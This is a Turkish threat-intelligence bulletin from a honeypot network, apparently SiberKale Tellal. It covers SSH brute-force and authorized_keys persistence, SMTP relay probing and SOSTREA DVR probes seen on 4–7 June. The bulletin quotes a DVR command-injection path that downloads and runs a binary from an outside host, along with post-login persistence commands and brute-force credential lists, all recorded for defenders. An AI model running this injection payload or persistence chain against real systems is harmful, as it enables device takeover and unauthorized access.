← Tüm Yazılar
IOC RAPORUHIGH7 Haziran 2026 · 6 dk okuma

Bülten 4–7 Haziran: Romanya Kaynaklı SSH Persistence Kuyruğu ve Düşmeyen SMTP/SOSTREA İzleri

4–7 Haziran penceresinde 3.39M ham event görüldü. 5 Haziran tek başına 1.84M event ile dönem zirvesi oldu. Romanya kaynaklı iki IP, SSH brute-force sonrası authorized_keys persistence davranışını sürdürdü; SMTP ve SOSTREA düşük hacimde ama kalıcı kaldı.

Analiz: Erdem Özyurt · SiberKale Tellal

İçindekiler 14
📅Veri dönemi: 4 Haziran 00:00 UTC – 7 Haziran 13:30 UTC · OPSEC-filtreli · son bülten sonrası

Yönetici Özeti

3.39Mham event
1.84M5 Haziran zirvesi
444KCowrie SSH/Telnet
8.2KMailoney SMTP

3 Haziran bülteni SSH persistence dalgasını, SMTP open-relay aramasının geri dönüşünü ve SOSTREA/TBK kuyruğunu raporlamıştı. 4–7 Haziran penceresi bu tablonun bitmediğini gösteriyor. Hacim 5 Haziran’da yeniden yükseldi; fakat bu kez manzara daha dar bir aktör kümesine sıkıştı: Romanya kaynaklı iki IP, SSH oturumları, pasif fingerprint verisi, IDS sinyali ve post-auth komut davranışıyla dönemin ana eksenini oluşturdu.

Bu yazı ham sensör loglarından üretildi. P0f kayıtları toplam hacme dahil edildi; çünkü bu pencerede saldırı altyapısının oturum hacmini anlamak için pasif fingerprint verisi önemli bir bağlam sağlıyor. Ancak davranış yorumu Cowrie, Suricata, Fatt, Mailoney ve Tanner sinyalleriyle çaprazlandı. Public API tarafı aynı dönemde veri yazmaya devam etti; son ölçümde toplam IoC sayısı 47.198, son 7 gün IoC sayısı 3.783 olarak göründü.

ℹ️ Veri Notu

Bu bülten OPSEC-filtreli ham sensör logları ve public API göstergeleri üzerinden hazırlanmıştır. Ham log toplamları ile anlık API sayaçları birebir aynı okunmamalıdır; iki kaynak farklı toplama ve zenginleştirme katmanlarından geçer.


Günlük Dağılım — 5 Haziran Tek Başına Pencerenin Yarısı

TarihHam EventP0fSuricataCowrieFattMailoneyTannerNot
4 Haz708.055255.731120.917174.34043.0852.8382.895SSH sonrası baseline yüksek
5 Haz1.839.1741.164.797351.107169.58734.7981.391840Dönem zirvesi
6 Haz407.584163.63551.12227.4377.0552.015998Hacim düşüyor, SMTP korunuyor
7 Haz432.664204.44967.45472.61015.6022.000600SSH yeniden belirginleşiyor

5 Haziran’daki 1.84M event, dört günlük pencerenin en keskin kırılması. Bu artış tek bir potun ölçüm hatası gibi görünmüyor. Aynı gün P0f, Suricata ve Cowrie birlikte yükseldi. Bu nedenle 5 Haziran’ı “gürültü” diye kenara ayırmak yerine, oturum açma denemesi, TCP/SSH fingerprint’i ve IDS sinyalinin birlikte büyüdüğü bir kampanya günü olarak okumak daha doğru.

Buna rağmen pencere sadece 5 Haziran’dan ibaret değil. 7 Haziran’da Cowrie yeniden 72K seviyesine çıktı. Bu, 3 Haziran bültenindeki “persistence kuyruğu sürüyor” tespitini güçlendiriyor: dalga bitmiyor, sadece hacmini ve kaynak dağılımını değiştiriyor.


1. Ana Aktör: Romanya Kaynaklı İki IP Aynı Playbook’u Taşıyor

Dönemin en baskın iki kaynağı aynı ağ/operatör bağlamında göründü:

IPEventÜlkeASN/OperatörDavranış
193.32.162.34691.978ROUnmanaged LtdSSH brute-force + persistence + fingerprint
193.32.162.35282.904ROUnmanaged LtdAynı playbook, daha düşük hacim

Bu iki IP toplamda yaklaşık 975K event üretti. Dağılımı da dikkat çekici:

IPP0fCowrieSuricataFatt
193.32.162.34279.244254.120108.19050.424
193.32.162.35108.518106.04547.23821.103

Bu tablo tekil bir port taramasından daha fazlasını söylüyor. P0f oturum yoğunluğunu, Cowrie SSH/Telnet etkileşimini, Suricata ağ imzalarını, Fatt ise protokol oturum bağlamını veriyor. Dört sinyal aynı iki kaynakta birleştiğinde elimizde yalnızca “çok istek atan IP” değil, belirgin davranış deseni olan bir kampanya kümesi kalıyor.

🚨 Kritik Okuma: Başarısız Login Sayısı Yetmez

Bu aktör ailesi yalnızca parola denemiyor. Başarılı oturum yakaladığında sistem bilgisini topluyor, .ssh dizinini hazırlıyor ve authorized_keys üzerinden kalıcılık kurmaya çalışıyor. Savunma tarafında başarısız login alarmı tek başına eksik kalır; post-auth komut zinciri ayrı korelasyon konusu olmalıdır.


2. SSH Davranışı: authorized_keys Hâlâ Ana Kalıcılık Yolu

Cowrie tarafında 4–7 Haziran arasında 444.284 event görüldü. Başarısız login sözlüğü yine klasik Linux/DevOps yüzeyine yüklendi:

Kullanıcı adıBaşarısız deneme
root12.782
deploy2.884
admin2.794
ubuntu2.701
dev2.547
oracle2.406
user1.821
mysql1.353
hadoop1.201
support1.058
ParolaBaşarısız deneme
1234564.543
123456782.232
password1.939
1231.371
12341.271
123451.223
root1.191
admin1.089
support1.035
admin123699

Başarılı oturum tarafında root, admin, user, test, ubuntu, git, solana, ethereum gibi kullanıcı adları öne çıktı. Bu liste iki ayrı ilgiyi birleştiriyor: klasik Linux sunucu hesapları ve daha önceki bültenlerde gördüğümüz kripto/validator temalı kullanıcı adları.

Post-auth Komut Zinciri

En sık görülen komutlar, saldırganın sisteme “girdi mi, nerede, ne kadar güçlü, kalıcılık bırakabilir mi?” sorularını hızlıca yanıtladığını gösteriyor:

Komut / davranışHitYorum
/bin/./uname -s -v -n -r -m362Kernel/OS parmak izi
cd ~; chattr -ia .ssh; lockr -ia .ssh301.ssh hazırlığı, immutable/lock kaldırma
cat /proc/cpuinfo ...262+CPU/VM kapasite keşfi
crontab -l262Kalıcılık noktası kontrolü
df -h, free -m, lscpu, top, w262+Kaynak ve oturum keşfi
rm -rf /tmp/secure.sh; ... pkill ...93Rakip/önceki payload temizleme izlenimi

Dosya indirme olayları bu yorumu güçlendiriyor. 4–7 Haziran arasında 395 cowrie.session.file_download kaydı oluştu. Bunların 297’si aynı SHA-256 değerine sahipti ve hedef dosya çoğunlukla authorized_keys oldu.

GözlemDeğer
authorized_keys hedefli kayıtlar297+
/root/.ssh/authorized_keys hedefleri103
/etc/hosts.deny hedefleri90
En sık SHA-256a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
İkinci SHA-25601ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

01ba4719... hash’i Nisan ortasında da öne çıkan SSH dropper/persistence ailesindendi. Haziran penceresinde yeniden görünmesi, bazı kampanya bileşenlerinin tek seferlik olmadığını; aralıklı, düşük hacimli tekrarlarla yaşamaya devam ettiğini gösteriyor.


3. Suricata: SSH ve Web Probe Aynı Hat Üzerinde

Suricata 4–7 Haziran arasında 723.659 event üretti. En sık imzalar şöyle:

İmzaAlertYorum
ET INFO CURL User Agent15.122Otomasyon / script tabanlı HTTP denemeleri
ET SCAN Potential SSH Scan12.446SSH kampanyasıyla uyumlu
ET HUNTING HTTP Request Body Longer Than Content-Length Specifies5.001Bozuk/şüpheli HTTP request gövdeleri
ET INFO Login Credentials Possibly Passed in POST Data5.001Web login/probe denemeleri
ET INFO SSH session in progress on Expected Port4.945SSH oturum yoğunluğu
ET INFO SSH-2.0-Go version string Observed4.415Go tabanlı scanner/bot parmak izi
ET INFO Request to Hidden Environment File - Inbound2.715.env avcılığı

Port dağılımı dönemin yüzeyini netleştiriyor:

PortSuricata EventBağlam
22293.117SSH ana gövde
443110.233HTTPS probe
8093.773HTTP probe
808076.248Alternatif web yüzeyi
2512.748SMTP
33061.732MySQL düşük hacimli

Mayıs başındaki MSSQL benzeri bir veri tabanı mega-probe’u bu pencerede yok. MySQL 3306 arka planda kalmış durumda. Asıl yoğunluk SSH ve web yüzeyi arasında bölünüyor. .env avcılığı, login form denemeleri ve curl user-agent imzaları, web tarafında da otomatik keşfin sürdüğünü gösteriyor.


4. SMTP: Büyük Dönüş Değil, Düşmeyen Kuyruk

Mailoney 4–7 Haziran penceresinde 8.240 event üretti. Bu hacim 2 Haziran’daki zirve kadar keskin değil; ancak open-relay aramasının tamamen sönmediğini gösteriyor.

Kaynak IPMailoney EventBağlam
102.220.160.993.448Önceki bültende de ana SMTP aktörü
158.94.210.1902.836Open-relay ailesiyle uyumlu
91.92.240.42981Kuyruk aktör
178.16.53.230656Kuyruk aktör
103.210.238.15496Düşük hacim

Burada önemli olan hacimden çok süreklilik. SMTP aktörleri kısa bir patlama yapıp tamamen kaybolmuyor; aynı kaynaklar veya yakın davranış ailesi birkaç gün sonra yeniden düşük/orta hacimle dönüyor. Mail gateway savunmasında “son 24 saat sakin” ölçütü tek başına güven vermez.

Savunma Notu

SMTP için asgari kontrol seti değişmiyor:

  • Open relay testleri düzenli yapılmalı.
  • Port 25 ve 587 farklı policy ile izlenmeli.
  • Başarısız RCPT TO denemeleri IP/ASN bazında gruplanmalı.
  • SPF/DKIM/DMARC doğru olsa bile relay yanlış konfigürasyonu ayrı risk olarak ele alınmalı.

5. SOSTREA/TBK: Ana Dalga Değil, Ama İmza Yaşıyor

Tanner 4–7 Haziran arasında 5.359 event üretti. En dikkat çekici path yine SOSTREA marker’ını taşıyor:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm bbc; wget http://169.40.104.99/bbc; chmod 777 bbc; ./bbc

Bu path 356 kez görüldü. Bu sayı önceki büyük DVR/RCE dalgalarına göre düşük; fakat imza değeri yüksek. Aynı payload marker’ının haftalar boyunca düşük hacimde yaşaması, aktörün hedef listesini tamamen terk etmediğini gösteriyor.

🔍 Bulgu: Düşük Hacim, Yüksek Attribution Değeri

SOSTREA bu pencerede manşet değil. Buna rağmen path ve payload biçimi sabit kaldığı için alarm listesinde tutulmalı. Bazı kampanyalar yüksek hacimle değil, uzun ömürlü marker'larla yakalanır.


6. Public API Göstergeleri: Feed Yeniden Yaşıyor

Ham sensör penceresinin yanında public API de veri yazmaya devam etti. Son ölçümde görünen tablo:

MetrikDeğer
Toplam IoC47.198
Bugün eklenen/görülen IoC434
Son 7 gün IoC3.783
Ortalama tehdit skoru15.8
Benzersiz ASN3.644

Top ülkeler ve portlar da genel yönü destekliyor:

ÜlkeIoC
US11.008
BR4.640
CN4.500
TR1.738
DE1.501
PortIoC
227.117
806.704
4433.735
531.395
1231.266
21925
3306893
3389656

API tarafındaki port sıralaması ham sensör bulgusuyla uyumlu: SSH, HTTP ve HTTPS üstte. DNS/NTP/FTP/RDP gibi servisler arka plan tarama yüzeyi olarak kalmaya devam ediyor.


IoC Tablosu — 4–7 Haziran Penceresi

IoCTürBağlamÖncelik
193.32.162.34IPRomanya kaynaklı SSH persistence ana aktörühigh
193.32.162.35IPAynı küme, aynı playbookhigh
46.101.184.11IPDigitalOcean kaynaklı P0f/Suricata/Fatt yoğunluğumedium
78.174.208.214IPTR kaynaklı P0f/Suricata yoğunluğumedium
185.177.72.16IPBucklog SARL web/IDS kümesimedium
185.177.72.51IPBucklog SARL web/IDS kümesimedium
101.47.29.104IPByteplus kaynaklı P0f/Suricata/Tanner görünümümedium
158.94.210.190IPSMTP open-relay kuyruğumedium
102.220.160.99IPSMTP ana aktör, önceki bültenle süreklilikhigh
a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2SHA-256authorized_keys hedefli persistence içeriğihigh
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546bSHA-256Nisan’dan dönen persistence/dropper marker’ımedium
169.40.104.99/bbcURL pathSOSTREA/TBK payload yoluhigh
ET SCAN Potential SSH ScanIDSSSH scan/persistence bağlamımedium
ET INFO SSH-2.0-Go version string ObservedIDSGo tabanlı scanner/bot parmak izimedium
ET INFO Request to Hidden Environment File - InboundIDS.env avcılığımedium

IOC’lar savunma amaçlı paylaşılır. Tekil IP engelleme kısa vadeli fayda sağlayabilir; ancak bu pencerenin asıl dersi IP değil davranıştır: başarılı login sonrası authorized_keys, .ssh hazırlığı, sistem fingerprint’i ve web/SMTP kuyruğunun birlikte izlenmesi gerekir.


Savunma Öncelikleri

Bu pencere için önerilen öncelik sırası:

  1. SSH post-auth izleme: Başarılı login sonrası ilk 60 saniyede authorized_keys, chattr, crontab, /tmp, /dev/shm, uname, cpuinfo komut zincirlerini korele edin.
  2. Key-only SSH: Password auth ve root login kapalı olmalı. Mecburi parola kullanan sistemlerde MFA, allowlist ve rate-limit birlikte uygulanmalı.
  3. Web yüzeyi temizliği: .env, login form, phpinfo ve bozuk Content-Length istekleri IDS/SIEM tarafında ayrı kategori olmalı.
  4. SMTP relay kontrolü: Open-relay testleri periyodik yapılmalı; RCPT TO başarısızlıkları kaynak ASN ile gruplanmalı.
  5. IoT/DVR marker takibi: SOSTREA/TBK düşük hacimde bile tutulmalı; çünkü path marker’ı attribution açısından uzun ömürlü.

Sonuç

4–7 Haziran penceresi, önceki bültenin devam cümlesi gibi okunmalı: SSH persistence kampanyası bitmedi, sadece daha dar ve yoğun bir kaynak kümesine toplandı. Romanya kaynaklı iki IP, dönemin ana aktörü oldu. 5 Haziran’daki 1.84M event zirvesi, SSH oturumları ve IDS sinyalleriyle birlikte geldi.

SMTP ve SOSTREA tarafında büyük patlama yok; fakat ikisi de “kapandı” denecek kadar sessiz değil. Özellikle SOSTREA path’inin haftalar sonra hâlâ görünmesi, düşük hacimli kampanyaların uzun süre izlenmesi gerektiğini hatırlatıyor.

Savunma tarafı için ana mesaj değişmedi: başarısız login sayacı tek başına yeterli değil. Saldırganın başarılı oturumdan sonraki ilk dakikası, çoğu zaman kampanyanın gerçek niyetini anlatıyor.


Metodoloji ve Lisans

Bu rapor 4–7 Haziran 2026 arası Tellal honeypot ağında toplanan ham logların OPSEC-filtreli analiziyle hazırlandı. Dahili IP’ler, yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır.

Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal — Threat Intelligence Feed · tellal.net